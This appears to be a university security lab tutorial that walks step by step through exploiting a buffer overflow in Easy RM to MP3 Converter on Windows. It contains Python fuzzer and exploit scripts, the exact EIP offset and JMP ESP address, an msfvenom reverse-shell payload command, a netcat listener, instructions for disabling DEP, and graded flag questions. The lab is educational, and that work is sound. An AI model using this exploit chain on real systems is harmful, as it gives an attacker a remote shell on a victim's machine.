ED 318: Exploiting Easy RM to MP3 Converter on Windows with ASLR (30 pts)

Purpose

Learn how to exploit a simple buffer overflow vulnerability to gain Remote Code Execution on Windows, defeating Address Space Layout Randomization.

We will use these tools:

What You Need

WARNING

This application is unsafe to run. The Windows machine will be vulnerable to compromise. I recommend performing this project on virtual machines with NAT networking mode, so no outside attacker can exploit your windows machine.

Installing the Vulnerable Application

On your Windows machine, in Firefox, go to

http://www.exploit-db.com/exploits/10374/

Click the icon to the right of the label "Vulnerable App", as shown below. If that link doesn't work, try this alterative download link.

The software downloads, with a long name starting with 707. Install the software with its default options. The program launches. as shown below.

After a few seconds, a "Preferences" box appears, as shown below.

Click OK.

Fuzzing: Length 10,000

We'll make a fuzzer that creates an attack file.

On your Linux machine, in a Terminal window, execute this command:

nano ezm-fuzz1
#!/usr/bin/python
attack = 'A' * 10000
print attack

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

Next you need to make the program executable. To do that, in Linux, in a Terminal window, execute this command:

chmod a+x ezm-fuzz1
In the Terminal window, execute this command to run the program, and put the output into a file named ezm-fuzz1.m3u:
./ezm-fuzz1 > ezm-fuzz1.m3u
In the Terminal window, execute this command to see the files you just created (note the command is "LS -L EZM*" all in lowercase; it does not contain any numeral 1 characters):
ls -l ezm*
You should see a file named ezm-fuzz1.m3u with a size of 10001, as shown below:

In the Terminal window, execute this command to see the attack file:

nano ezm-fuzz1.m3u
The file contains a long line of "A" characters, as shown below:

Press Ctrl+X to exit the nano editor.

Copying the File from Linux to Windows

In the Terminal window, execute these commands to make your Linux machine serve files over HTTP:
sudo apt update
sudo apt install apache2 -y
sudo service apache2 start
sudo cp ezm-fuzz1.m3u /var/www/html
ip a
Find your Linux machine's IP address, as highlighted in the image below:

On your Windows machine, in Firefox, open this URL, replacing the IP address with the IP address of your Linux server:

10.128.0.9/ezm-fuzz1.m3u
Save the file in your Downloads folder, as shown below.

Opening the Attack File: Length 10,000

On your Windows machine, in the "Easy RM to MP3 Converter" box, click Load.

In the Open box, in the "Look in" drop-down list box, select Downloads.

At the bottom, in the "Files of type" drop-down list box, select "Playlist Files".

Double-click the ezm-fuzz1.m3u file, as shown below:

An error message appears, as shown below:

The program did not crash. It's still processing instructions as the designer intended, so this attack failed.

In the error box, click OK.

The program now shows a "AAAAAAAAAAA" message, as shown below.

To get rid of that, close "Easy RM to MP3 Converter" and re-open it from the Start button.

Fuzzing: Lengths 20,000 and 30,000

In the Terminal window, execute these commands to copy your fuzzer twice:
cp ezm-fuzz1 ezm-fuzz2
cp ezm-fuzz1 ezm-fuzz3
In the Terminal window, execute this command to edit your ezm-fuzz2 file:
nano ezm-fuzz2
Change the length in the file from 10000 to 20000, as shown below:

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

In the Terminal window, execute this command to run the program, and put the output into a file named ezm-fuzz2.m3u:

./ezm-fuzz2 > ezm-fuzz2.m3u
Repeat the steps above to modify ezm-fuzz3 to use a length of 30000, create an attack file named ezm-fuzz3.m3u, and copy it to your desktop.

In the Terminal window, execute this command:

ls -l ezm*
You should see three .m3u files, with lengths of 10001, 20001, and 30001, as shown below:

As you did before, transfer the files to your Windows machine.

Opening the Attack File: Length 20,000

On your Windows machine, in "Easy RM to MP3 Converter", open the ezm-fuzz2.m3u file.

The same error message appears, as shown below:

Once again, the program did not crash.

Close the error message. Close "Easy RM to MP3 Converter". Launch "Easy RM to MP3 Converter" again from the Start button.

If a box pops up warning you that this is a trial version, close it.

Opening the Attack File: Length 30,000

On your Windows machine, in "Easy RM to MP3 Converter", open the ezm-fuzz3.m3u file.

Now it crashes, with the message "Easy RM to MP3 Converter has stopped working". The details say "APPCRASH", as shown below:

This is more promising--the application encountered an error it could not handle.

In the error message, click "Close the program".

Observing the Crash in the Immunity Debugger

You should have Immunity and Mona installed from a previous project.

Launch Immunity with Administrator privileges.

In Immunity, click File, Open.

Navigate to

C:\Program Files (x86)\Easy RM to MP3 Converter\RM2MP3Converter.exe
When the panes fill with text, click the magenta Run button. Click the Run button again.

"Easy RM to MP2 Converter" opens in Immunity, as shown below. It may not pop to the front--you may have to click its icon on the Taskbar.

In "Easy RM to MP3 Converter", open the ezm-fuzz3.m3u file.

In Immunity, at the bottom left, you see "Access violation when executing [41414141]", as shown below.

This is what we needed--a classic buffer overflow. Some of the "A" characters ended up in the EIP, as the address of the next instruction to be executed, so we have a way to take control of the computer.

Restarting Immunity and "Easy RM to MP3 Converter"

From the Immunity menu bar, click Debug, Restart. Click Yes. Click the magenta Run button. Click the Run button again.

Creating a Nonrepeating Pattern of Characters

On your Linux machine, in a Terminal window, execute this command:
nano findeip
In the nano window, type or paste this code.
#!/usr/bin/python

chars = 'A' * 20000
for i in range(10000,20000,4):
   s = str(i)
   c = s[1:]
   chars += c
print chars

Save the file with Ctrl+X, Y, Enter.

Execute these commands to make the file executable and run it:

chmod a+x findeip
./findeip
The end of the output is shown below. The output is a series of thousand-byte strings labelled with letters, counting upward by fours, indicating the count of bytes up to that location.

For example, the highlighted string below is J860, indicating that there are nine groups of 1000 bytes before this (the letters A through I) and 860 bytes in this group to the left of that number.

Execute these commands to run findeip, placing the output into a file named findeip.m3u, and copy it to the home directory for your Apache web server:

./findeip > findeip.m3u
sudo cp *.m3u /var/www/html
On your Windows machine, in Firefox, download the findeip.m3u file and open it in "Easy RM to MP3 Converter", as you did before.

In Immunity, at the bottom left, you see "Access violation when executing [47303830]", as shown below.

You may see a different result if you are using a different Windows version, and need to adjust the code below to match the location of the eip on your target system.

Counting the Characters

At the crash, eip contained 47303830, which is the string 080G.

The number of bytes to this point are:

20000 -- bytes before the nonrepeating pattern
 6000 -- the thousands labelled "A", "B", "C", "D", "E", and "F"
   80 -- bytes before the string "G080"
    1 -- the "G" in "G080" precedes the eip

Targeting the EIP Precisely

Let's make sure we can hit the EIP.

On your Linux machine, in a Terminal window, execute this command:

nano hiteip
In the nano window, type or paste this code.
#!/usr/bin/python

prefix = 'A' * 26081
eip = 'BCDE'
padding = 'F' * (30000 - len(prefix) - 4)
attack = prefix + eip + padding
print attack

Save the file with Ctrl+X, Y, Enter.

Execute these commands to create the hiteip.m3u file, and copy it to the home directory for your Apache web server:

chmod +x hiteip
./hiteip > hiteip.m3u
sudo cp *.m3u /var/www/html
On your Windows machine, in Firefox, download the hiteip.m3u file.

In Immunity, restart "Easy RM to MP3 Converter" and open the hiteip.m3u file.

In Immunity, at the bottom left, you see "Access violation when executing [45444342]", as shown below. This is the desired string "BCDE" -- we now control the eip!

Examining Memory at ESP

Let's see what ended up at the location pointed to by ESP.

In the upper right pane of Immunity, left-click the value to the right of ESP, so it's highlighted in blue, as shown below.

Then right-click the highlighted value and click "Follow in Dump".

Look in the lower left pane of Immunity. It's full of the 'F' characters we put at the end of the exploit text.

But are there 'F' characters before ESP? To find out, scroll the lower left pane up one row.

Now you can see that there are only four 'F' characters before the ESP, as shown below.

So we can put our shellcode immediately after the first 4 'F' characters.

Listing Modules with Mona

In Immunity, at the bottom, there is a white bar. Click in that bar and type this command, followed by the Enter key:

!mona modules
Scroll to the start of the list, as shown below.


ED 318.1: Size of MSVCP60.dll Module (15 pts)

The flag is the size of the MSVCP60.dll module, covered by a blue rectangle in the image above.

Finding a Module that Doesn't Move

We need a module that doesn't change its address each time the program is launched.

The best thing would be to find one with ASLR=False and Rebase=False, but the only module like that is RM2MP3Converter.exe. However, we can't use that module, because it has a null byte in its address.

So the next thing to try is to see if a module with Rebase=True and ASLR=False doesn't move in practice, even though it could, in principle, be rebased.

I saved logs from three runs of Immunity, and kept only the modules with ASLR=False.

Here are my results:

Look at the "Base" address. The first item, "MSRMfilter03.dll" doesn't move!

Finding a JMP ESP

In Immunity, at the bottom, there is a white bar. Click in that bar and type this command, followed by the Enter key:

!mona jmp -r esp -m MSRMfilter03.dll

There is one useful address, as shown below:

0x1001b058

Restarting Immunity and "Easy RM to MP3 Converter"

Close Immunity.

Launch Immunity with Administrator privileges.

In Immunity, click File. In the lower section, click item 1: "C:\Program Files\Easy RM to MP3 Converter\RM2MP3Converter.exe".

Click the Run button.

Testing Code Execution

Let's make sure we can run the code at the location we plan to inject into EIP.

Instead of real shellcode, we'll use a 16-byte NOP sled followed by an INT 3 ('\xCC').

If the code executes properly, it will slide down the NOP sled and halt at the INT 3.

On your Linux machine, in a Terminal window, execute this command:

nano ezm-eip4
In the nano window, type or paste this code:
#!/usr/bin/python

prefix = 'A' * 26081
eip = '\x58\xb0\x01\x10'
skip4 = 'FFFF'
nopsled = '\x90' * 16
int3 = '\xCC'
padding = 'F' * (30000 - len(prefix) - 4 -4 -16 -1)
attack = prefix + eip + skip4 + nopsled + int3 + padding
print attack

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

On your Linux machine, in a Terminal window, execute these commands:

chmod a+x ezm-eip4

./ezm-eip4 > ezm-eip4.m3u

cp ezm-eip4.m3u ~/Desktop
Transfer the ezm-eip4.m3u file to your Windows machine and open it in "Easy RM to MP3 Converter".

The lower left corner of the Immunity window now says "INT3 command", as shown below.

Troubleshooting

If execution stops at a NOP, you have Data Execution Prevention turned on.

To turn it off, open Computer Properties.

In the next window, on the left side, click "Advanced system settings".

On the Advanced tab, in the Performance section, click Settings.

In "Performance Options", on the "Data Execution Prevention" tab, click "Turn on DEP for essential Windows programs and services only".

Click OK.

Click OK.

Restart your Windows server.

In the upper left pane of Immmunity, scroll up to see the NOP sled, followed by the INT3.

Immunity misinterpreted the first few bytes of the NOP sled, but that doesn't matter--the NOP sled executed.

Everything worked correctly--we are executing code we injected!

Closing Immunity

Close Immunity.

Avoiding Bad Characters

Notice that we have a lot of space to put exploit code--several thousand bytes.

In a case like this, we can use a very simple exploit encoding, restricting the encoded output to alphanumeric characters, thus avoiding concerns about bad characters.

Finding your Machine's IP Address

On your Linux machine, in a Terminal window, execute this command.
ifconfig
Find your machine's IP address and make a note of it.

Generating Exploit Code

On your Linux machine, in a Terminal window, execute the command below.

Replace the IP address with the IP address of your Linux machine.

sudo msfvenom -p windows/shell_reverse_tcp LHOST="10.128.0.9" LPORT=443 EXITFUNC=thread -e x86/alpha_mixed -f python > ezm-attack2

This command makes an exploit that will connect from the Windows target back to the Linux attacker on port 443 and execute commands from Linux.

The exploit is output directly into a file named "ezm-attack2" because it's too long to see all at once in a Terminal window.

Completing the Attack Code

On your Linux machine, in a Terminal window, execute the command below.

nano ezm-attack2
The exploit code appears, as shown below.

Add these lines to the start of the file, as shown below:

#!/usr/bin/python

prefix = 'A' * 26081
eip = '\x58\xb0\x01\x10'
skip4 = 'FFFF'
nopsled = '\x90' * 16

Scroll to the bottom of the file.

Add these lines at the bottom, as shown below:

padding = 'F' * (30000 - len(prefix) - 4 - 4 - 16 -len(buf))
attack = prefix + eip + skip4 + nopsled + buf + padding
print attack

To save the code, type Ctrl+X, then release the keys and press Y, release the keys again, and press Enter.

On your Linux machine, in a Terminal window, execute these commands:

chmod a+x ezm-attack2
./ezm-attack2 > ezm-attack2.m3u
Transfer the ezm-attack2.m3u file to your Windows machine.

Starting a Listener

On your Linux machine, in a Terminal window, execute this command:
sudo apt install netcat -y
sudo nc -nlvp 443

Open "Easy RM to MP3 Converter" from the Start button. You don't need to use Immunity.

In "Easy RM to MP3 Converter", open the ezm-attack.m3u file.

You should see a Windows command prompt in Linux--now you own the Windows box!


ED 318.2: Tasklist (15 pts.)

Execute this command:
tasklist | findstr MP
The flag is the output covered by a green box in the image below.


Sources

Exploit writing tutorial part 1 : Stack Based Overflows

http://www.exploit-db.com/exploits/10374/

Alphanumeric Shellcode


Posted 7-1-14 7:38 am by Sam Bowne
Revised 8:24 am with better way to find JMP ESP (ty @corelanc0d3r)
Revised 9:25 am; now working with ASLR thanks to @corelanc0d3r!
Revised for use at CCSF and tested on 2 and Win Server 2008 9-27-15
Off-by-10 "Troubleshooting" tip added 4-6-17
DEP tip added 4-7-17
Image showing Windows 2008 offset added 3-24-18
Flag ED 318.1 labelled correctly
Point total fixed 11-25-19